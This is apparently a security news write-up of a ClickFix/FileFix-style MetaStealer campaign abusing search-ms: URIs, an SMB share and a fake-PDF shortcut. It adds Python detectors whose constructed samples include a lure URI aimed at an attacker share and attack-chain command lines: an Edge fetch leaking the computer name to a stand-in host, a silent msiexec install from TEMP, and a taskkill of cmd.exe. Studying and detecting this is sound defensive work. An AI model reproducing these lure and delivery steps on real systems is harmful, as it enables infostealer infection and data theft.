Attackers Weaponize File Explorer and Fake PDFs in ClickFix-Style MetaStealer Campaign
Researchers from Huntress have uncovered a malicious campaign that puts a new twist on the widely known ClickFix technique. ClickFix has remained prominent since gaining traction in August 2024: the lure convinces victims that they must resolve a problem, usually a CAPTCHA check, and talks them into running a command that fetches malware. Attackers have since refined the method into further “fix” variants such as FileFix, reported in June 2025, which leverages Windows File Explorer instead of the Run dialog. This latest campaign masqueraded as an AnyDesk installer, with an infection chain built to trick victims into launching a sequence of commands that ultimately delivered MetaStealer, a commodity infostealer active since 2022. Huntress's discovery underscores the ongoing evolution of social engineering built around ClickFix-style deception, where each iteration blends user interaction with subtle abuse of native Windows functionality.
The attack chain relied on the Windows "search-ms:" protocol handler to initiate execution. A crafted search-ms URI pointed the victim's File Explorer at an attacker-controlled SMB share. “Windows File Explorer then directs the victim to an attacker-controlled SMB share, essentially a remote file share allowing clients to access files on a remote server over a network,” report Huntress researchers. The share presented a file named "Readme Anydesk.pdf", which was not a document but a Windows shortcut (LNK) wearing a PDF name. Opening it started a "cmd.exe" sequence that launched Microsoft Edge to download a legitimate AnyDesk installer while also fetching a secondary file dropped into the user's "TEMP" directory. Huntress noted, “Notably, this fake PDF is configured to grab the %COMPUTERNAME% environment variable as a subdomain… a clever way for the attacker to nab that information from the victim.” This step leaked system-specific data to the attackers while keeping the lure convincing: the victim does receive a real AnyDesk download. For defenders, a search-ms URI whose location crumb names a UNC path outside the organization is the earliest point at which this chain can be caught, before any share is ever mounted.
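As an added example (this is not Huntress's code and does not appear in the report), the following Python parses a search-ms: URI of the kind described above and reports whether its location crumb would send File Explorer to a remote share. It goes slightly beyond the text by also recognising the "//host/share" and "smb://host/share" spellings. The sample URIs, the 203.0.113.5 address, the share and host names are all constructed for illustration.

```python
# Added example (not Huntress's code): parse a search-ms: URI of the kind the
# campaign used and report whether it points File Explorer at a remote share.
from urllib.parse import unquote

# Path prefixes that make File Explorer reach out over the network.
REMOTE_PREFIXES = ("\\\\", "//", "smb://")


def parse_search_ms(uri):
    """Split a search-ms: URI into its '&'-separated key=value parameters.

    Values are percent-decoded; repeated keys (several crumb= entries are
    legal) are kept in order. Raises ValueError for any other scheme.
    """
    scheme, sep, body = uri.partition(":")
    if sep != ":" or scheme.strip().lower() != "search-ms":
        raise ValueError("not a search-ms: URI")
    params = {}
    for part in body.split("&"):
        key, _, value = part.partition("=")
        if key:
            params.setdefault(key.strip().lower(), []).append(unquote(value))
    return params


def remote_locations(params):
    """Return each crumb=location: value that names a UNC or SMB path."""
    found = []
    for crumb in params.get("crumb", []):
        kind, _, value = crumb.partition(":")
        if kind.strip().lower() == "location" and value.startswith(REMOTE_PREFIXES):
            found.append(value)
    return found


def unc_host(path):
    """Host part of \\\\host\\share, //host/share or smb://host/share."""
    stripped = path.replace("smb://", "", 1).lstrip("\\/")
    return stripped.replace("\\", "/").split("/", 1)[0]


def triage(uri):
    """Hosts this URI would make File Explorer connect to (empty if none)."""
    return [unc_host(p) for p in remote_locations(parse_search_ms(uri))]


# Constructed sample URIs; 203.0.113.5 is a documentation address, not a real C2.
LURE = ("search-ms:query=Readme%20Anydesk"
        "&crumb=location:%5C%5C203.0.113.5%5Canydesk"
        "&displayname=Downloads")   # displayname is what the victim sees in the title bar
LOCAL = "search-ms:query=invoice&crumb=location:C:%5CUsers%5Cbob%5CDocuments"

if __name__ == "__main__":
    for uri in (LURE, LOCAL):
        hosts = triage(uri)
        print("REMOTE ->" if hosts else "local only", hosts, "|", uri)
```

The displayname parameter is worth a second look in any triage: it controls what the victim sees in the Explorer title bar, so a lure can label an attacker's share as "Downloads" or "Desktop" regardless of where the location crumb actually points.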
Following the lure, the downloaded file was handed to "msiexec", which executed it as an MSI package despite its PDF disguise. The original "cmd.exe" process was then terminated with "taskkill" to obscure the activity. Inside the MSI, further payloads included a malicious DLL and a CAB archive containing "1.js" for cleanup and "ls26.exe", the dropper for MetaStealer. The MetaStealer executable is protected with a packer and is consistent with previous samples known to target sensitive data, including browser-stored credentials and cryptocurrency wallets. Huntress characterized the sequence as a demonstration of evolving attacker tradecraft: signed, benign processes (Edge, msiexec), obfuscation through environment variables, and staged payload delivery converge into a campaign designed to evade detection. The most visible seam for detection is the process tree itself, in which "explorer.exe" spawns "cmd.exe", which in turn runs "msiexec.exe" against a package in the user's "TEMP" directory and then terminates that same "cmd.exe" with "taskkill". This case reflects the refinements attackers are applying to extend the lifespan of ClickFix-derived threats and maintain the technique's effectiveness.
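As an added example (not Huntress's code, and not a detection rule from the report), the Python below hunts for the explorer → cmd → {Edge, msiexec, taskkill} chain described in the two paragraphs above over process-creation events. It assumes events carry pid, ppid, image and cmdline fields, as Sysmon Event ID 1 or an EDR's process telemetry would; the event list, the machine name WS-1234, the user bob and the .invalid hostnames are constructed for illustration, and the "%COMPUTERNAME% as a subdomain" tell is modelled as the leftmost DNS label, which is an assumption about how the page's wording maps to a URL.

```python
# Added example (not Huntress's code): hunt for the explorer -> cmd -> {Edge,
# msiexec, taskkill} chain over constructed process-creation events.
import re
from urllib.parse import urlsplit

# Substring that marks the per-user TEMP directory in a lowercased Windows path.
TEMP_MARK = "\\appdata\\local\\temp\\"


def image_name(path):
    """Executable file name, lowercased, from a full image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def url_hosts(cmdline):
    """Hostnames of every http(s) URL in a command line (urlsplit lowercases them)."""
    return [urlsplit(u).hostname or "" for u in re.findall(r"https?://\S+", cmdline)]


def find_suspicious_chains(events, computer_name):
    """One hit per cmd.exe (child of explorer.exe) whose children match the
    campaign: msiexec on a package in TEMP plus at least one further tell."""
    by_pid = {e["pid"]: e for e in events}
    cn = computer_name.lower() + "."   # assumption: %COMPUTERNAME% is the leftmost label
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if (image_name(e["image"]) != "cmd.exe" or parent is None
                or image_name(parent["image"]) != "explorer.exe"):
            continue
        reasons = []
        for child in (c for c in events if c["ppid"] == e["pid"]):
            name = image_name(child["image"])
            cl = child["cmdline"].lower()
            if name == "msedge.exe" and any(h.startswith(cn) for h in url_hosts(child["cmdline"])):
                reasons.append("Edge fetch from a host whose subdomain is %COMPUTERNAME%")
            if name == "msiexec.exe" and TEMP_MARK in cl:
                reasons.append("msiexec run against a package in %TEMP%")
            if name == "taskkill.exe" and "cmd.exe" in cl:
                reasons.append("taskkill aimed at the parent cmd.exe")
        if any(r.startswith("msiexec") for r in reasons) and len(reasons) >= 2:
            hits.append({"pid": e["pid"], "cmdline": e["cmdline"], "reasons": reasons})
    return hits


# Constructed events in a Sysmon-like shape; the machine name WS-1234, the user
# bob and the .invalid hostnames are made up for this example.
COMPUTER_NAME = "WS-1234"
TEMP = "C:\\Users\\bob\\AppData\\Local\\Temp\\"
EVENTS = [
    {"pid": 100, "ppid": 4, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    # the shortcut's target: one cmd.exe that drives the whole chain
    {"pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c start msedge https://download.example.invalid/AnyDesk.exe"},
    {"pid": 300, "ppid": 200,
     "image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
     "cmdline": "msedge.exe https://WS-1234.cdn.example.invalid/Readme%20Anydesk.pdf"},
    {"pid": 400, "ppid": 200, "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec.exe /i \"" + TEMP + "Readme Anydesk.pdf\" /qn"},
    {"pid": 500, "ppid": 200, "image": "C:\\Windows\\System32\\taskkill.exe",
     "cmdline": "taskkill /f /im cmd.exe"},
    # benign: a user opened a prompt from Explorer and installed an MSI from Downloads
    {"pid": 600, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 700, "ppid": 600, "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Users\\bob\\Downloads\\tool.msi"},
]

if __name__ == "__main__":
    for hit in find_suspicious_chains(EVENTS, COMPUTER_NAME):
        print(f"pid {hit['pid']}: {hit['cmdline']}")
        for reason in hit["reasons"]:
            print("  -", reason)
```

Requiring the msiexec-from-TEMP tell plus one more keeps the benign Explorer → cmd → msiexec case quiet while still firing when the hostname check cannot be evaluated (for instance when the Edge command line is not logged), because the taskkill of the parent cmd.exe supplies the second signal.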